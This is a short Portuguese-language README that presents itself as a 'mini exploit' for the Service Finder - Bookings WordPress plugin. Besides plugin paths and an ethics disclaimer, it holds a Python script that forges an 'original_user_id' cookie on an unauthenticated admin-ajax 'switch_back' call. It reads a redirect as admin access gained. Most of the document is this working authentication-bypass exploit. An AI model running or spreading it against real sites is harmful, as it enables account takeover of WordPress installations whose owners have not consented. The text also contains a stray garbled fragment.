
Um mini exploit para o plugin Service Finder - Bookings do WP
O plugin Service Finder é um sistema de reservas e gestão de serviços para WordPress.
Devido à sua popularidade e complexidade, algumas versões tiveram problemas de segurança relacionados a endpoints AJAX não autenticados ou controlos de acesso inadequados.
Este README explica como os investigadores podem identificar instalações com segurança e seguir práticas éticas (dbr krk).
/wp-content/plugins/service-finder/
/wp-content/plugins/service-finder-bookings/
/wp-content/plugins/sf-booking/
⚠️ Aviso:
Estas pesquisas destinam-se apenas a fins educacionais e de investigação. Não tente aceder ou explorar sem autorização.
import requests
url = "https://example.com/wp-admin/admin-ajax.php?action=service_finder_switch_back"
cookies = {
'original_user_id': '1',
}
r = requests.get(url, cookies=cookies)
print(r.status_code)
print(r.text)
300-399: ✅ VULNERÁVEL! Redireciona para o painel de administração como ADMIN400-499: ⚠️ Erro de cliente — o pedido foi inválido ou não autorizado, não vulnerável